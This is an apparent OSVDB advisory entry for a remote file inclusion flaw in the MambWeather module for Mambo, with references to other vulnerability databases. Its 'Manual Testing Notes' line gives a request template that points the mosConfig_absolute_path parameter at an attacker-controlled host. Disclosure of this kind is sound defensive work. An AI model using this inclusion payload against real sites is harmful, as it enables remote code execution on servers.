MambWeather for Mambo Savant2_Plugin_options.php mosConfig_absolute_path Variable Remote File Inclusion

2006-10-22T08:03:55
ID OSVDB:29933
Type osvdb
Reporter OSVDB
Modified 2006-10-22T08:03:55

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

This may be the same issue as the one reported in the Mosets Tree package (OSVDB 28708), which is included in the MambWeather module.

Manual Testing Notes

http://[target]/[path]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker]

References:

Secunia Advisory ID: 22521
ISS X-Force ID: 29697
Generic Exploit URL: http://milw0rm.com/exploits/2613
FrSIRT Advisory: ADV-2006-4150
CVE-2006-5519
Bugtraq ID: 20667